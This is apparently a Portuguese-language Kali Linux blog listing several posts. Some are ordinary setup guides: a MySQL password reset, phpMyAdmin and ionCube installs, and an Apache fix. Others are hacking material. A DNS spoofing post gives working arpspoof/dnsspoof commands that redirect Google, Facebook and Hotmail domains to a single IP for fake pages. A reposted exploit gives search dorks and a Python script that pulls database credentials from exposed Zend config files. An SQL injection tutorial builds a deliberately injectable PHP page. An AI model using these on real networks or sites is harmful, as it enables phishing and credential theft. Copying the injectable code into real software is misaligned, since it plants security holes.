Mostrando postagens com marcador Linux. Mostrar todas as postagens
Mostrando postagens com marcador Linux. Mostrar todas as postagens

quarta-feira, 1 de julho de 2015

Kali Linux DNS Spoofing

Awe pessoal hoje vou falar um pouco sobre DNS Spoof;

O que é DNS Spoof?


DNS Spoof é uma técnica em que os hackers usa para redireciona um sites  que as vítimas querem acessar.
A maioria das pessoas que usam páginas fakes fazem isso.

Falsificação de DNS (ou cache DNS envenenamento) é um computador de hackers ataque, segundo o qual os dados são introduzidos em um Domain Name System (DNS) resolver 's de cache , fazendo com que o servidor de nomes para retornar um incorreto endereço IP , desviando o tráfego para o
computador do atacante (ou qualquer outro computador). Fonte: Wikepedia


Comando:

$ echo "1" >> /proc/sys/net/ipv4/ip_forward


$ arpspoof -i wlan0 192.168.0.1

Creie uma Lista ex:

66.135.216.190 *.google.com
66.135.216.190 mail.live.com
66.135.216.190 br.msn.com
66.135.216.190 m.facebook.com
66.135.216.190 www.facebook.com
66.135.216.190 pt-br.facebook.com


$ dnsspoof -i wlan0 -f lista

Video:

Kali Linux DNS Spoofing from Mathew Thomas on Vimeo.

Read More

quinta-feira, 22 de janeiro de 2015

SQL Injection - Injeção de SQL- TUTORIAL Completo Básico

Introdução
A Injeção de SQL, mais conhecida através do termo americano SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação. 
Fonte: Wikepédia


Requesitos
Um Servidor Linux ou "Windows com o Xampp"
O Linux com apache2 instalado e o MySQL, também com o phpMyadmin
O Windows com o Xampp, Xampp já vem com tudo comfigurado
Um editor de texto, como exemplo bloco de nota && notepad++ && sublime
ou o netbeans, eu prefiro o netbeans.

Criando uma Pagina
Primeiro, navegue ate a pasta /var/www/, abra o terminal e digite:
$ cd /var/www 
Agora crie uma pasta, comando:
$ /var/www# mkdir pagetest
Listar diretorio
$ /var/www# ls -lAh
drwxr-xr-x  2 root root 4.0K Jan 19 23:26 pagetest
Em seguida alterei as permissões, comando:
$ /var/www# chmod 777 pagetest -R
Liste mais uma vez o diretorio isso não é obrigatorio
$ /var/www# ls -lAh
drwxrwxrwx  2 root root 4.0K Jan 19 23:26 pagetest
Agora Vamos criar um arquivo de configuração, para fazer a conexão como o servido mysql, para acender um banco de dados. No terminal digite: para entra dentro da pasta onde vamos trabalhar
$ /var/www# cd pagetest/
Agora digite:
$ /var/www/pagetest# nano config.php
No editor copie ou escreva essas linhas e salve o arquivo;
<?php
# " localhost " endereço do banco esse ira ficar assim mesmo pois vc vai esta localmente
# " root " usuario do banco
# " dmyka1728 " senha do banco
# " dbtest " nome do banco
# Subistitua isso pelo seus dados
mysql_connect("localhost","root","dmyka1728");
mysql_select_db("dbtest");
Agora vamos criar a nossa index principal, lembrando, não irei estiliza com CSS , comando digite:
$ /var/www/pagetest# nano index.php
No editor copie ou escreva essas linhas e salve o arquivo;
<?php
include "config.php"; #Incluir o nosso arquivo de configuração com o banco
?>
<html>
<head>
<title>Index-Test</title>
</head>
<body>
Visualizar Dados <a href="index.php?id=1">Ver</a></br></br>
 <?php
  $id = $_GET['id'];
  $sqlquery = "SELECT * FROM infousers WHERE id='$id'";
  $execute = mysql_query($sqlquery);
   while ($row = mysql_fetch_array($execute)){
    echo "
    <b>Name:</b> $row[1]</br>
    <b>Fone:</b> $row[2]</br>
    <b>Data:</b> $row[3]</br>
    <b>CPF:</b>  $row[4]</br></br>";
   }
 ?>
</body>
</html>
Logando no phpMyAdmin
Agora  iremos logar no phpmyadmin pra poder criar o banco e tabelas e inserir os dados para nossos testes.
Abra o seu navegador de preferencial, navegue até o enderço http://localhost/phpmyadmin - logger com seus dados - em user do mysql e pass do mysql, como mostra a imagem abaixo:

video:
Read More

Recupera Senha do Mysql # Debian # Kali Linux

Bom Pessoal,
Hoje nesse post vou falar sobre como você pode recuperar a senha do MYSQL, porque isso aconteceu agora comigo e eu precisava urgente lembra ou trocar a senha, uffa dabem que consegui, isso é rapido e facil de fazer, vou deixar de conversar e vamos colocar a mão no teclado



# PASSO 1
Vamos primeiro terminar o serviço do MYSQL

$ /etc/init.d/mysql stop ou $ service mysql stop
root@kali:~# /etc/init.d/mysql stop
[ ok ] Stopping MySQL database server: mysqld.
root@kali:~#

# PASSO 2
Agora vamos iniciar o MySQL em modo de segurança, para podemos ter acesso para alterar a senha

$ mysqld_safe --skip-grant-tables --skip-networking
root@kali:~# mysqld_safe --skip-grant-tables --skip-networking &
[1] 12206
root@kali:~# 150106 12:23:26 mysqld_safe Logging to syslog.
150106 12:23:26 mysqld_safe Starting mysqld daemon with databases from /var/lib/mysql
root@kali:~#
mysqld_safe, é a maneira recomendada de iniciar um servidor mysqld no Unix e no NetWare. mysqld_safe adiciona algumas caracteristicas de segurança como reiniciar o servidor quando ocorre um erro e registrar informação em tempo de execução em um log de erros.  As descrições do registro de erros e comportamentos especificos do NetWare são tratados mais adiante nesta seção. 

--skip-grant-tables, serve para o MySQL iniciar sem o responsável
pela verificação das permissões dos usuários, dando permissão total a todos os usuários.

--skip-networking, serve para que nenhuma conexão TCP/IP seja aceita,
evitando que alguém se aproveite deste tempo para "destruir" seu banco de dados.

# PASSO 3

Agora banco desprotegido, iremos nos conectar para alterar a senha do usuário que queremos recuperar. Neste exemplo, vou usar o meu unico usuario, o  root

$ mysql -u root 
$ update mysql.user set password=PASSWORD('SUANOVASENHA') where user='root';
$  flush privileges;
root@kali:~# mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.5.40-0+wheezy1 (Debian)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> update mysql.user set password=PASSWORD('SUANOVASENHA') where user='root';
Query OK, 4 rows affected (0.00 sec)
Rows matched: 4  Changed: 4  Warnings: 0

mysql>flush privileges;

mysql>exit

root@kali:~#
Agora com a senha do usuario root já alterada. Agora vamos parar o serviço MySQL e iniciá-lo novamente, para que o MySQL inicie sem os skip

$ /etc/init.d/mysql stop ou service mysql stop
root@kali:~#  /etc/init.d/mysql stop
[....] Stopping MySQL database server: mysqld150106 12:25:08 mysqld_safe mysqld from pid file /var/run/mysqld/mysqld.pid ended
. ok
[1]+  Done                    mysqld_safe --skip-grant-tables --skip-networking
root@kali:~#
$ /etc/init.d/mysql start ou service mysql start
root@kali:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..
root@kali:~#

Agora vamos  logar com a nova senha

$ mysql -u root -pSUANOVASENHA
root@kali:~# mysql -u root -pSUANOVASENHA
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.40-0+wheezy1 (Debian)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> exit
Bye
root@kali:~#

VIDEO


Read More

quarta-feira, 21 de janeiro de 2015

Instalação ionCube no Kali Linux

O que é o IonCube?


O IonCube é um aplicativo que visa a proteção do código-fonte de arquivos escritos em PHP.
Para que a criptografia seja interpretada pelo servidor de destino é necessário que o mesmo possua instalado o IonCube Loader.
O IonCube possui um motor de codificação avançado de código-compilado, realizando a criptografia do código sem prejuízo para a performance do ambiente.
A criptografia deve ser realizada diretamente no computador do desenvolvedor, utilizando o software IonCube PHP Encoder. Após esse processo, os códigos devem ser enviados para o servidor de Hospedagem.

Fonte: http://www.uolhost.com.br

Mais : ioncube.com

Download loader-wizard

Direto: Aqui

Download Loader Packages x86-64 Linux
Direto: Aqui

Sistema Operacional usado:
Linux kali 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
Video Tutorial
Read More

Zend-Framework Full Info Disclosure

# Exploit Title : Zend-Framework Full Info Disclosure
# Google Dork : inurl:/application/configs/application.ini
# Date : 26/11/2013
# Exploit Author : Ariel Orellana
# Vendor Homepage : http://framework.zend.com/
# Category : Web applications
# Tested on : GNU/Linux

#[Comment]Greetz : Daniel Godoy

#[PoC] :
#The username and password of the database may be obtained trough the "application.ini" file

#Vulnerable page : http://target.com/application/configs/application.ini
#Vulnerable page : http://target.com/application/configs/application.ini
#Vulnerable page : http://target.com/application/configs/db.ini
#Vulnerable page : http://target.com/application/configs/config.ini



Dork -> inurl:/application/configs/application.ini

Dork -> site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

Dork -> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

Dork -> inurl:/configs/ "params.password" db.ini ext:ini

Dork -> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password

#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/application/configs/application.ini"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

http://www.exploit-db.com/exploits/29921/



Read More

Kali Linux / Parrot - How to Install phpMyAdmin

# Olá Pessoal
# Vou Mostra um Guia de configuração do phpMyadmin no Kali Linux

# Iniciar o apache &amp; o mysql
$root@$kali:~ service apache2 start &amp;&amp; service mysql start "

# Logar no Mysql
root@kali:~ mysql -h localhost -u root

# Inserir uma senha para o usuario do Mysql
root@kali:~ set password for root@localhost = password('abc12345');
root@kali:~ exit

# Atualizar e Instalar
root@kali:~ apt-get update
root@kali:~ apt-get install phpmyadmin

# Localize files.conf
root@kali:~ find /etc -name apache.conf
root@kali:~ find /etc -name apache2.conf

# Incluir as configurações do phpmyadmin ao apache2
root@kali:~ echo -e "\nInclude /etc/phpmyadmin/apache.conf" &gt;&gt; /etc/apache2/apache2.conf

# Reiniciar os serviços
root@kali:~ service apache2 restart &amp;&amp; service mysql restart


Video Download

Read More

apache2: Could not reliably determine the server's

Olá pessoal,
Acho que vocês já se depararam como uma mensagem  de erro ao iniciar o apache

ERROR
* Starting web server apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
Então vamos iniciar a correção, é bem simples:
Abra o Terminal e digite:
# sudo sh -c 'echo "ServerName localhost" >> /etc/apache2/conf.d/name' && sudo service apache2 restart
Imagem Ilustrativa

Read More